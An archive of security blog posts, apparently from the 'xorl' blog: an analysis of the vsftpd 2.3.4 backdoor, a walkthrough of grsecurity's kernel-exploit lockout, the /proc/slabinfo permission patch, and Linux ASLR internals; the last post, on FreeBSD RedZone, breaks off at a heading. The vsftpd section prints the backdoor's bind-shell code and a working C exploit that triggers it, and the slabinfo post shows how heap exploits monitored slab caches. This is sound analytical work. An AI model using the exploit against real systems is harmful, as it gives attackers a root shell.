xorl %eax, %eax

Archive for the ‘security’ Category

vsftpd 2.3.4 Backdoor

with 4 comments

This was a recent discovery by Chris Evans and you can read more details in his blog post. Furthermore, you can find coverage of this incident at The H Open and LWN.net.

So, the backdoor specifically affects version 2.3.4 of the popular FTP daemon and can be found in str.c, the file containing the string manipulation routines.

int
str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
{
  static struct mystr s_curr_line_str;
  unsigned int pos = 0;
  while (str_getline(p_str, &s_curr_line_str, &pos))
  {
    if (str_equal(&s_curr_line_str, p_line_str))
    {
      return 1;
    }
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))
    {
       vsf_sysutil_extra();
    }
  }
  return 0;
}

Quite obvious. While parsing the received string values, if the string contains the byte sequence “\x3A\x29”, which in ASCII translates to ‘:)’ (a smiley face), it will invoke vsf_sysutil_extra().

This backdoor function was placed in sysdeputil.c file and looks like this:

int
vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  exit(1); 
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  { 
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0); 
  } 
}

It simply opens a TCP socket listening on port 6200 and spawns a shell for anyone who connects to that port.

So, by using ‘:)’ in the username the attackers were able to trigger this backdoor in vsftpd 2.3.4.
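
For illustration, the attack flow described above could be scripted roughly like this. This is only a sketch of the mechanics: the target address is a placeholder and most error handling is omitted.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Connect to the given IPv4 address/port; returns the socket fd or -1. */
static int tcp_connect(const char *ip, unsigned short port)
{
  int fd;
  struct sockaddr_in sa;

  if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    return -1;
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(port);
  inet_pton(AF_INET, ip, &sa.sin_addr);
  return connect(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0 ? -1 : fd;
}

int main(void)
{
  const char *target = "192.0.2.1";   /* placeholder address */
  char buf[256];
  int n, ftp, sh;

  /* Any username containing ":)" trips the check in str_contains_line(). */
  if ((ftp = tcp_connect(target, 21)) < 0)
    return 1;
  write(ftp, "USER backdoored:)\r\n", 19);
  write(ftp, "PASS whatever\r\n", 15);
  sleep(2);               /* give vsf_sysutil_extra() time to bind */

  /* The backdoor shell should now be listening on port 6200. */
  if ((sh = tcp_connect(target, 6200)) < 0)
    return 1;
  write(sh, "id\n", 3);
  if ((n = read(sh, buf, sizeof(buf) - 1)) > 0) {
    buf[n] = '\0';
    printf("%s", buf);    /* e.g. uid=0(root) gid=0(root) */
  }
  return 0;
}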

Written by xorl

July 5, 2011 at 03:54

Posted in hax, security

GRKERNSEC_KERN_LOCKOUT Active Kernel Exploit Response

leave a comment »

This is a brand new feature in the “Address Space Protection” section of grsecurity. Its configuration help text is very clear, and the feature is implemented by adding just two new routines to the existing patch.

config GRKERNSEC_KERN_LOCKOUT
	bool "Active kernel exploit response"
	depends on X86
	help
	  If you say Y here, when a PaX alert is triggered due to suspicious
	  activity in the kernel (from KERNEXEC/UDEREF/USERCOPY)
	  or an OOPs occurs due to bad memory accesses, instead of just
	  terminating the offending process (and potentially allowing
	  a subsequent exploit from the same user), we will take one of two
	  actions:
	   If the user was root, we will panic the system
	   If the user was non-root, we will log the attempt, terminate
	   all processes owned by the user, then prevent them from creating
	   any new processes until the system is restarted
	  This deters repeated kernel exploitation/bruteforcing attempts
	  and is useful for later forensics.

First of all, the ‘user_struct’ at include/linux/sched.h was updated to include two new members that will be used to keep track of the banned users. Here is the code snippet that shows the newly added members.

/*
 * Some day this will be a full-fledged user tracking system..
 */
struct user_struct {
   ...
        struct key *session_keyring;    /* UID's default session keyring */
#endif
 
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	unsigned int banned;
	unsigned long ban_expires;
#endif
   ...
};

Next we can have a look at grsecurity/grsec_sig.c to see the first function which is responsible for handling the banned users.

int gr_process_user_ban(void)
{
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	if (unlikely(current->cred->user->banned)) {
		struct user_struct *user = current->cred->user;
		if (user->ban_expires != ~0UL && time_after_eq(get_seconds(), user->ban_expires)) {
			user->banned = 0;
			user->ban_expires = 0;
			free_uid(user);
		} else
			return -EPERM;
	}
#endif
	return 0;
}

What it does is check whether the user is banned and, if so, whether ‘user->ban_expires’ has already passed so that the ban can be lifted. Of course, this does not apply to users whose ‘ban_expires’ is set to ‘~0UL’; those users stay banned until the system is restarted.

The next routine also located in the same source code file is this one.

void gr_handle_kernel_exploit(void)
{
#ifdef CONFIG_GRKERNSEC_KERN_LOCKOUT
	const struct cred *cred;
	struct task_struct *tsk, *tsk2;
	struct user_struct *user;
	uid_t uid;

	if (in_irq() || in_serving_softirq() || in_nmi())
		panic("grsec: halting the system due to suspicious kernel crash caused in interrupt context");

	uid = current_uid();

	if (uid == 0)
		panic("grsec: halting the system due to suspicious kernel crash caused by root");
	else {
		/* kill all the processes of this user, hold a reference
		   to their creds struct, and prevent them from creating
		   another process until system reset
		*/
		printk(KERN_ALERT "grsec: banning user with uid %u until system restart for suspicious kernel crash\n", uid);
		/* we intentionally leak this ref */
		user = get_uid(current->cred->user);
		if (user) {
			user->banned = 1;
			user->ban_expires = ~0UL;
		}

		read_lock(&tasklist_lock);
		do_each_thread(tsk2, tsk) {
			cred = __task_cred(tsk);
			if (cred->uid == uid)
				gr_fake_force_sig(SIGKILL, tsk);
		} while_each_thread(tsk2, tsk);
		read_unlock(&tasklist_lock);
	}
#endif
}

So, if this is called in the context of an interrupt (IRQ, SoftIRQ or NMI) or the current user is root, it will immediately invoke panic() to halt the system and avoid any possible further exploitation of a kernel vulnerability. In any other case it will log the event and ban the user by updating the ‘banned’ and ‘ban_expires’ members of the ‘user_struct’ structure. The final ‘while_each_thread’ loop uses gr_fake_force_sig(), shown below, to terminate (by sending SIGKILL) every task owned by the user who triggered the event.

#ifdef CONFIG_GRKERNSEC
extern int specific_send_sig_info(int sig, struct siginfo *info, struct task_struct *t);

int gr_fake_force_sig(int sig, struct task_struct *t)
{
	unsigned long int flags;
	int ret, blocked, ignored;
	struct k_sigaction *action;

	spin_lock_irqsave(&t->sighand->siglock, flags);
	action = &t->sighand->action[sig-1];
	ignored = action->sa.sa_handler == SIG_IGN;
	blocked = sigismember(&t->blocked, sig);
	if (blocked || ignored) {
		action->sa.sa_handler = SIG_DFL;
		if (blocked) {
			sigdelset(&t->blocked, sig);
			recalc_sigpending_and_wake(t);
		}
	}
	if (action->sa.sa_handler == SIG_DFL)
		t->signal->flags &= ~SIGNAL_UNKILLABLE;
	ret = specific_send_sig_info(sig, SEND_SIG_PRIV, t);

	spin_unlock_irqrestore(&t->sighand->siglock, flags);

	return ret;
}
#endif

This routine delivers the requested signal to the process, forcing the default action even if the signal was blocked or ignored.

So, now to the actual patching. The first patched code is the __kprobes oops_end() routine located in the arch/x86/kernel/dumpstack.c file.

void __kprobes oops_end(unsigned long flags, struct pt_regs *regs, int signr)
{
   ...
 	if (panic_on_oops)
 		panic("Fatal exception");

	gr_handle_kernel_exploit();

	do_group_exit(signr);
}

This is triggered at the last step of a kernel OOPS, which makes it an ideal location for this protection. Next we have the ‘execve’ routines that are invoked when spawning new processes, specifically the compat_do_execve() shown here from the fs/compat.c file.

/*
 * compat_do_execve() is mostly a copy of do_execve(), with the exception
 * that it processes 32 bit argv and envp pointers.
 */
int compat_do_execve(char * filename,
        compat_uptr_t __user *argv,
        compat_uptr_t __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

This is where it checks whether the user is banned. Of course, a similar check is also included in the do_execve() routine backing the execve(2) system call, in fs/exec.c.

/*
 * sys_execve() executes a new program.
 */
int do_execve(const char * filename,
        const char __user *const __user *argv,
        const char __user *const __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

Finally, pax_report_usercopy() is updated to trigger the new lockout feature whenever a USERCOPY violation is detected.

void pax_report_usercopy(const void *ptr, unsigned long len, bool to, const char *type)
{
	if (current->signal->curr_ip)
		printk(KERN_ERR "PAX: From %pI4: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			&current->signal->curr_ip, to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);
	else
		printk(KERN_ERR "PAX: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);

	dump_stack();
	gr_handle_kernel_exploit();
	do_group_exit(SIGKILL);
}

Written by xorl

April 27, 2011 at 22:43

Posted in grsecurity, linux, security

Linux kernel /proc/slabinfo Protection

with 3 comments

Recently, Dan Rosenberg committed this patch to the Linux kernel. The patch affects the SLAB and SLUB allocators, changing the permissions of the ‘/proc/slabinfo’ file; first in slab_proc_init() for SLAB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo",S_IWUSR|S_IRUGO,NULL,&proc_slabinfo_operations);
+	proc_create("slabinfo", S_IWUSR|S_IRUSR, NULL,
+		    &proc_slabinfo_operations);
#ifdef CONFIG_DEBUG_SLAB_LEAK

As well as in the equivalent slab_proc_init() for SLUB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo", S_IRUGO, NULL, &proc_slabinfo_operations);
+	proc_create("slabinfo", S_IRUSR, NULL, &proc_slabinfo_operations);
 	return 0;
}

The concept behind this is quite simple and was previously implemented in grsecurity (check out GRKERNSEC_PROC_ADD) by spender. Almost anyone who has ever developed a kernel heap exploit for the Linux kernel knows that using ‘/proc/slabinfo’ you can easily track the status of the slab cache you are corrupting.
This patch limits the reliability of Linux kernel heap exploitation since unprivileged users can no longer read this procfs file.
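
To see what exploit developers lose here, this is roughly what tracking a target cache looked like while ‘/proc/slabinfo’ was world-readable. The cache name is just an example; after the patch, the fopen() simply fails for non-root users.

#include <stdio.h>
#include <string.h>

/*
 * Print active/total object counts for one slab cache (e.g. "size-32").
 * A heap exploit would poll this to watch its target slab fill up.
 */
static int slab_status(const char *cache)
{
        char name[64], line[512];
        unsigned long active, total;
        FILE *fp = fopen("/proc/slabinfo", "r");

        if (fp == NULL)
                return -1;      /* EACCES for non-root after the patch */
        while (fgets(line, sizeof(line), fp) != NULL) {
                if (sscanf(line, "%63s %lu %lu", name, &active, &total) == 3 &&
                    strcmp(name, cache) == 0)
                        printf("%s: %lu/%lu objects in use\n",
                               name, active, total);
        }
        fclose(fp);
        return 0;
}

int main(void)
{
        return slab_status("size-32");  /* general-purpose 32-byte cache */
}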

Written by xorl

March 5, 2011 at 14:22

Posted in linux, security

Linux kernel ASLR Implementation

with 4 comments

Since June 2005 (specifically 2.6.12), the Linux kernel has built-in ASLR (Address Space Layout Randomization) support. In this post I’m trying to give a brief description of how this is implemented. However, I will be focusing more on the x86 architecture since this protection mechanism involves some architecture-dependent details.

Random Number Generation
The PRNG used for the Linux kernel’s ASLR is the get_random_int() routine, as we’ll see later in this post. This function is located in the drivers/char/random.c file and is shown below.

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];
  ...
/*
 * Get a random word for internal kernel use only. Similar to urandom but
 * with the goal of minimal entropy pool depletion. As a result, the random
 * value is not cryptographically secure but for several uses the cost of
 * depleting entropy is too high
 */
DEFINE_PER_CPU(__u32 [4], get_random_int_hash);
unsigned int get_random_int(void)
{
        struct keydata *keyptr;
        __u32 *hash = get_cpu_var(get_random_int_hash);
        int ret;

        keyptr = get_keyptr();
        hash[0] += current->pid + jiffies + get_cycles();

        ret = half_md4_transform(hash, keyptr->secret);
        put_cpu_var(get_random_int_hash);

        return ret;
}

It uses the get_cpu_var()/put_cpu_var() C macros to fetch and release the per-CPU hash array defined just above the function. This leaves us with get_keyptr(), which returns a pointer to the current ‘keydata’ structure, and the actual random number generation.
The ‘keydata’ pointer is obtained using this C function:

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];

static unsigned int ip_cnt;
  ...
static inline struct keydata *get_keyptr(void)
{
        struct keydata *keyptr = &ip_keydata[ip_cnt & 1];

        smp_rmb();

        return keyptr;
}

The smp_rmb() macro is defined in arch/x86/include/asm/system.h header file for the x86 architecture and it stands for Read Memory Barrier.

/*
 * Force strict CPU ordering.
 * And yes, this is required on UP too when we're talking
 * to devices.
 */
#ifdef CONFIG_X86_32
/*
 * Some non-Intel clones support out of order store. wmb() ceases to be a
 * nop for these.
 */
#define mb() alternative("lock; addl $0,0(%%esp)", "mfence", X86_FEATURE_XMM2)
#define rmb() alternative("lock; addl $0,0(%%esp)", "lfence", X86_FEATURE_XMM2)
#define wmb() alternative("lock; addl $0,0(%%esp)", "sfence", X86_FEATURE_XMM)
#else
#define mb()    asm volatile("mfence":::"memory")
#define rmb()   asm volatile("lfence":::"memory")
#define wmb()   asm volatile("sfence" ::: "memory")
#endif
  ...
#ifdef CONFIG_SMP
#define smp_mb()        mb()
#ifdef CONFIG_X86_PPRO_FENCE
# define smp_rmb()      rmb()
#else
# define smp_rmb()      barrier()
#endif

This guarantees that reads preceding the barrier complete before any subsequent reads that depend on them. As we can read in the same header file:

 * No data-dependent reads from memory-like regions are ever reordered
 * over this barrier.  All reads preceding this primitive are guaranteed
 * to access memory (but not necessarily other CPUs' caches) before any
 * reads following this primitive that depend on the data return by
 * any of the preceding reads.  This primitive is much lighter weight than
 * rmb() on most CPUs, and is never heavier weight than is
 * rmb().
 *
 * These ordering constraints are respected by both the local CPU
 * and the compiler.
 *
 * Ordering is not guaranteed by anything other than these primitives,
 * not even by data dependencies.  See the documentation for
 * memory_barrier() for examples and URLs to more information.

This ensures that the reads of ‘keydata’ don’t get reordered. Back in get_random_int() we can now have a look at the exact random number generation code. According to:

hash[0] += current->pid + jiffies + get_cycles()

We have four different values involved. Those are:
– The first element of the per-CPU ‘get_random_int_hash’ array
– The PID of the currently executing process
– The system’s jiffies value
– The CPU’s cycle counter
The last value comes from the get_cycles() inline function, which is defined at arch/x86/include/asm/tsc.h for the x86 architecture.

static inline cycles_t get_cycles(void)
{
        unsigned long long ret = 0;

#ifndef CONFIG_X86_TSC
        if (!cpu_has_tsc)
                return 0;
#endif
        rdtscll(ret);

        return ret;
}

This means that if the processor supports the rdtsc instruction, it will jump to the arch/x86/include/asm/msr.h header file to execute the following code:

static __always_inline unsigned long long __native_read_tsc(void)
{
        DECLARE_ARGS(val, low, high);

        asm volatile("rdtsc" : EAX_EDX_RET(val, low, high));

        return EAX_EDX_VAL(val, low, high);
}
  ...
#define rdtscll(val)                                            \
        ((val) = __native_read_tsc())

Which simply executes the rdtsc instruction.
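
For reference, the same counter can be read from userspace with a couple of lines of inline assembly; a minimal sketch assuming an x86 CPU and GCC-style asm:

#include <stdio.h>

/* Read the CPU's time-stamp counter, like the kernel's rdtscll() does. */
static inline unsigned long long rdtsc(void)
{
        unsigned int lo, hi;

        /* rdtsc returns the low 32 bits in EAX and the high 32 in EDX. */
        asm volatile("rdtsc" : "=a" (lo), "=d" (hi));
        return ((unsigned long long)hi << 32) | lo;
}

int main(void)
{
        printf("cycles: %llu\n", rdtsc());
        return 0;
}
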
Back in get_random_int() we can see that even though plenty of hard-to-guess values feed the pseudo-random integer, the hash is also passed through half_md4_transform(), which is defined in lib/halfmd4.c and implements a reduced MD4 algorithm.

/* F, G and H are basic MD4 functions: selection, majority, parity */
#define F(x, y, z) ((z) ^ ((x) & ((y) ^ (z))))
#define G(x, y, z) (((x) & (y)) + (((x) ^ (y)) & (z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
  ...
#define ROUND(f, a, b, c, d, x, s)      \
        (a += f(b, c, d) + x, a = (a << s) | (a >> (32 - s)))
#define K1 0
#define K2 013240474631UL
#define K3 015666365641UL
  ...
__u32 half_md4_transform(__u32 buf[4], __u32 const in[8])
{
        __u32 a = buf[0], b = buf[1], c = buf[2], d = buf[3];

        /* Round 1 */
        ROUND(F, a, b, c, d, in[0] + K1,  3);
        ROUND(F, d, a, b, c, in[1] + K1,  7);
        ROUND(F, c, d, a, b, in[2] + K1, 11);
        ROUND(F, b, c, d, a, in[3] + K1, 19);
        ROUND(F, a, b, c, d, in[4] + K1,  3);
        ROUND(F, d, a, b, c, in[5] + K1,  7);
        ROUND(F, c, d, a, b, in[6] + K1, 11);
        ROUND(F, b, c, d, a, in[7] + K1, 19);

        /* Round 2 */
        ROUND(G, a, b, c, d, in[1] + K2,  3);
        ROUND(G, d, a, b, c, in[3] + K2,  5);
        ROUND(G, c, d, a, b, in[5] + K2,  9);
        ROUND(G, b, c, d, a, in[7] + K2, 13);
        ROUND(G, a, b, c, d, in[0] + K2,  3);
        ROUND(G, d, a, b, c, in[2] + K2,  5);
        ROUND(G, c, d, a, b, in[4] + K2,  9);
        ROUND(G, b, c, d, a, in[6] + K2, 13);

        /* Round 3 */
        ROUND(H, a, b, c, d, in[3] + K3,  3);
        ROUND(H, d, a, b, c, in[7] + K3,  9);
        ROUND(H, c, d, a, b, in[2] + K3, 11);
        ROUND(H, b, c, d, a, in[6] + K3, 15);
        ROUND(H, a, b, c, d, in[1] + K3,  3);
        ROUND(H, d, a, b, c, in[5] + K3,  9);
        ROUND(H, c, d, a, b, in[0] + K3, 11);
        ROUND(H, b, c, d, a, in[4] + K3, 15);

        buf[0] += a;
        buf[1] += b;
        buf[2] += c;
        buf[3] += d;

        return buf[1]; /* "most hashed" word */
}

This makes things even more complex for anyone attempting to guess the resulting integer. Now that we have a basic understanding of the pseudo-random number generation routine utilized by the Linux ASLR implementation, we can move on to the actual code that uses it.

brk(2) Randomization
The Linux kernel’s ELF loader lives in fs/binfmt_elf.c. The routine that loads the actual executable binary is load_elf_binary(), which among other things includes the following code.

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
        unsigned long load_addr = 0, load_bias = 0;
  ...
#ifdef arch_randomize_brk
        if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1))
                current->mm->brk = current->mm->start_brk =
                        arch_randomize_brk(current->mm);
#endif
  ...
out_free_ph:
        kfree(elf_phdata);
        goto out;
}

This means that if ‘arch_randomize_brk’ is defined, it will check whether the current process should have a randomized virtual address space using the ‘PF_RANDOMIZE’ flag, as well as whether ‘randomize_va_space’ is greater than 1. If this is the case, it will update the starting address of the data segment with the return value of arch_randomize_brk().
The latter routine can be found in arch/x86/kernel/process.c for the x86 family.

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
        unsigned long range_end = mm->brk + 0x02000000;
        return randomize_range(mm->brk, range_end, 0) ? : mm->brk;
}

It computes the end of the randomization window by adding 0x02000000 (32MB) to the current brk and then calls randomize_range() to pick an address inside that window. This randomization routine is also placed in drivers/char/random.c and you can see it here:

/*
 * randomize_range() returns a start address such that
 *
 *    [...... <range> .....]
 *  start                  end
 *
 * a <range> with size "len" starting at the return value is inside in the
 * area defined by [start, end], but is otherwise randomized.
 */
unsigned long
randomize_range(unsigned long start, unsigned long end, unsigned long len)
{
        unsigned long range = end - len - start;

        if (end <= start + len)
                return 0;
        return PAGE_ALIGN(get_random_int() % range + start);
}

If the range is valid, it adds get_random_int() modulo the range to the starting address and, of course, the resulting value is aligned to the next page boundary as defined by the ‘PAGE_SIZE’ constant.
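
To put numbers on this: with a 0x02000000 (32MB) window and 4KB pages, the randomized brk can land on one of 8192 page boundaries, i.e. 13 bits of entropy. A trivial sketch of the arithmetic:

#include <stdio.h>

int main(void)
{
        unsigned long range = 0x02000000UL;     /* window added to mm->brk */
        unsigned long page  = 4096;             /* PAGE_SIZE on x86 */
        unsigned long slots = range / page;     /* page-aligned start choices */
        unsigned long n = slots;
        int bits = 0;

        while (n >>= 1)
                bits++;
        printf("brk randomization: %lu slots, %d bits of entropy\n",
            slots, bits);                       /* 8192 slots, 13 bits */
        return 0;
}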

SYSCTL Interface
In the previous section we encountered a variable named ‘randomize_va_space’. As almost any Linux administrator knows, Linux ASLR can be tuned through ‘/proc/sys/kernel/randomize_va_space’ or the ‘kernel.randomize_va_space’ SYSCTL variable. In both cases the result is passing an integer value to the kernel, as we can read in kernel/sysctl.c which is where this is defined.

static struct ctl_table kern_table[] = {
  ...
#if defined(CONFIG_MMU)
        {
                .procname       = "randomize_va_space",
                .data           = &randomize_va_space,
                .maxlen         = sizeof(int),
                .mode           = 0644,
                .proc_handler   = proc_dointvec,
        },
#endif
  ...
/*
 * NOTE: do not add new entries to this table unless you have read
 * Documentation/sysctl/ctl_unnumbered.txt
 */
        { }
};

The actual variable ‘randomize_va_space’ is placed in mm/memory.c as shown below.

/*
 * Randomize the address space (stacks, mmaps, brk, etc.).
 *
 * ( When CONFIG_COMPAT_BRK=y we exclude brk from randomization,
 *   as ancient (libc5 based) binaries can segfault. )
 */
int randomize_va_space __read_mostly =
#ifdef CONFIG_COMPAT_BRK
                                        1;
#else
                                        2;
#endif

Here, the ‘__read_mostly’ modifier is an architecture specific attribute which in case of x86 processors is defined in arch/x86/include/asm/cache.h header file.

#define __read_mostly __attribute__((__section__(".data..read_mostly")))

This forces the variable to be placed in a section called .data..read_mostly that is designed for variables which are initialized once and very rarely written.
From the kernel developers’ comment we can also see that if the compatibility support option for the brk(2) system call is enabled, brk is excluded from randomization since it could break old (libc5-based) binaries. Additionally, this variable is defined in SYSCTL’s binary table as we can find in the kernel/sysctl_binary.c file.

static const struct bin_table bin_kern_table[] = {
  ...
        { CTL_INT,      KERN_RANDOMIZE,                 "randomize_va_space" },
  ...
        {}
};

This uses the ‘KERN_RANDOMIZE’ value as defined in the include/linux/sysctl.h header file.

/* CTL_KERN names: */
enum
{
  ...
        KERN_RANDOMIZE=68, /* int: randomize virtual address space */
  ...
};

Now that we have a basic understanding of what is going on in the kernel when manipulating that variable through SYSCTL interface, we can move to the more interesting parts…

Stack Randomization
The actual stack randomization takes place in fs/exec.c and more specifically in the setup_arg_pages() routine which is responsible for the final stage of stack initialization before executing a binary. Here is a code snippet that demonstrates how the stack randomization is implemented…

/*
 * Finalizes the stack vm_area_struct. The flags and permissions are updated,
 * the stack is optionally relocated, and some extra space is added.
 */
int setup_arg_pages(struct linux_binprm *bprm,
                    unsigned long stack_top,
                    int executable_stack)
{
  ...
#ifdef CONFIG_STACK_GROWSUP
  ...
#else
        stack_top = arch_align_stack(stack_top);
        stack_top = PAGE_ALIGN(stack_top);
  ...
out_unlock:
        up_write(&mm->mmap_sem);
        return ret;
}

If the stack segment does not grow upwards, it will call arch_align_stack(), passing the stack top address which was an argument of the setup_arg_pages() routine. Then it will align the returned value to a page boundary and continue with the stack segment setup. Assuming that we’re dealing with the x86 architecture, the initial function call leads to the arch/x86/kernel/process.c file where we can find the following code.

unsigned long arch_align_stack(unsigned long sp)
{
        if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
                sp -= get_random_int() % 8192;
        return sp & ~0xf;
}

The check is fairly simple. If the currently executing task doesn’t have the ‘ADDR_NO_RANDOMIZE’ personality set (which is used to disable the randomization) and ‘randomize_va_space’ has a non-zero value, it will subtract up to 8191 bytes (get_random_int() % 8192) from the stack pointer. Before moving on, for completeness here is the include/linux/personality.h header file’s definition of the above personality constant.

/*
 * Flags for bug emulation.
 *
 * These occupy the top three bytes.
 */
enum {
        ADDR_NO_RANDOMIZE =     0x0040000,      /* disable randomization of VA space */
  ...
};
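
Incidentally, since this flag can be set from userspace via personality(2), a process can opt itself and its exec’d children out of ASLR. A minimal sketch of what setarch -R essentially does:

#include <stdio.h>
#include <unistd.h>
#include <sys/personality.h>

int main(int argc, char **argv)
{
        unsigned long pers;

        if (argc < 2) {
                fprintf(stderr, "usage: %s <program> [args]\n", argv[0]);
                return 1;
        }
        /* Query the current persona and add the no-randomization flag. */
        pers = personality(0xffffffff);
        if (personality(pers | ADDR_NO_RANDOMIZE) < 0) {
                perror("personality");
                return 1;
        }
        execvp(argv[1], &argv[1]);      /* run the target without ASLR */
        perror("execvp");
        return 1;
}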

Back to arch_align_stack(): after decrementing the stack pointer by the random amount for an ASLR-enabled task, it aligns it to 16 bytes by masking it with ~0xf (0xfffffff0 on 32-bit processors). However, a quick look in fs/binfmt_elf.c shows that this is not the whole story, since this is how the ELF loader sets up the stack…

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
  ...
        /* Do this so that we can load the interpreter, if need be.  We will
           change some of these later */
        current->mm->free_area_cache = current->mm->mmap_base;
        current->mm->cached_hole_size = 0;
        retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
                                 executable_stack);
  ...
        goto out;
}

We can see here that it passes a randomized stack top pointer using the randomize_stack_top() routine from the same source code file.

#ifndef STACK_RND_MASK
#define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12))     /* 8MB of VA */
#endif

static unsigned long randomize_stack_top(unsigned long stack_top)
{
        unsigned int random_variable = 0;

        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                random_variable = get_random_int() & STACK_RND_MASK;
                random_variable <<= PAGE_SHIFT;
        }
#ifdef CONFIG_STACK_GROWSUP
        return PAGE_ALIGN(stack_top) + random_variable;
#else
        return PAGE_ALIGN(stack_top) - random_variable;
#endif
}

Once again, the stack top is randomized only if the current process has the ‘PF_RANDOMIZE’ flag set and does not have the ‘ADDR_NO_RANDOMIZE’ personality. In that case it uses get_random_int() masked with ‘STACK_RND_MASK’. Although you see a definition of the latter constant in the given code snippet, it is originally defined in the architecture-specific arch/x86/include/asm/elf.h header file.

#ifdef CONFIG_X86_32

#define STACK_RND_MASK (0x7ff)

This is pretty much the stack ASLR implementation of Linux.
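
The effect is easy to observe from userspace: with the 0x7ff page mask the stack top moves inside an ~8MB window (11 bits of page-level entropy), plus the sub-page jitter from arch_align_stack(). Compiling and running this a few times prints a different address on each run, unless randomize_va_space is 0:

#include <stdio.h>

int main(void)
{
        int local;

        /* The address changes across runs while randomize_va_space != 0. */
        printf("stack local at %p\n", (void *)&local);
        return 0;
}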

mmap(2) Randomization
Before we dive into the mmap(2) randomization itself, what happens when mmap(2) allocations collide with the randomized stack space?
To avoid such collisions with the stack’s randomized virtual address space, the Linux kernel developers implemented the following routine in the arch/x86/mm/mmap.c file.

static unsigned int stack_maxrandom_size(void)
{
        unsigned int max = 0;
        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
        }

        return max;
}


/*
 * Top of mmap area (just below the process stack).
 *
 * Leave an at least ~128 MB hole with possible stack randomization.
 */
#define MIN_GAP (128*1024*1024UL + stack_maxrandom_size())
#define MAX_GAP (TASK_SIZE/6*5)

After performing the usual checks on the currently executing task, it calculates the maximum possible stack randomization size based on the ‘STACK_RND_MASK’ value. Later on, inside mmap_base() we can see how the above C macros are used to keep a gap below the stack large enough to absorb its randomization.

static unsigned long mmap_base(void)
{
        unsigned long gap = rlimit(RLIMIT_STACK);

        if (gap < MIN_GAP)
                gap = MIN_GAP;
        else if (gap > MAX_GAP)
                gap = MAX_GAP;

        return PAGE_ALIGN(TASK_SIZE - gap - mmap_rnd());
}

Here is also our first contact with the mmap(2) randomization routine which is, of course, through mmap_rnd(). This one is placed in arch/x86/mm/mmap.c and its code is this:

static unsigned long mmap_rnd(void)
{
        unsigned long rnd = 0;

       /*
        *  8 bits of randomness in 32bit mmaps, 20 address space bits
        * 28 bits of randomness in 64bit mmaps, 40 address space bits
        */
        if (current->flags & PF_RANDOMIZE) {
                if (mmap_is_ia32())
                        rnd = (long)get_random_int() % (1<<8);
                else
                        rnd = (long)(get_random_int() % (1<<28));
        }
        return rnd << PAGE_SHIFT;
}

Which is pretty self-explanatory code.
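
The same experiment as with the stack works here too; under ‘PF_RANDOMIZE’ an anonymous mapping lands at a different page-aligned address on every execution thanks to mmap_rnd():

#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
        /* The returned address varies across runs thanks to mmap_rnd(). */
        void *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

        if (p == MAP_FAILED) {
                perror("mmap");
                return 1;
        }
        printf("anonymous mapping at %p\n", p);
        munmap(p, 4096);
        return 0;
}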

So, I believe this post should give readers a grasp of how Linux ASLR is implemented. I used version 2.6.36 of the Linux kernel, so the details may not match future releases, but for now it is up-to-date. Any comments, corrections or suggestions are always welcome.

Written by xorl

January 16, 2011 at 21:09

Posted in linux, security

FreeBSD Red Zone – Kernel Buffer Corruption Detector

leave a comment »

Since FreeBSD 7.0, a feature named “RedZone” has been implemented inside the operating system’s kernel to detect buffer underflows and overflows in kernel memory at run-time. It was developed and is maintained by Pawel Jakub Dawidek and it’s placed in vm/redzone.c and vm/redzone.h in FreeBSD’s kernel code.

The SYSCTL Interface
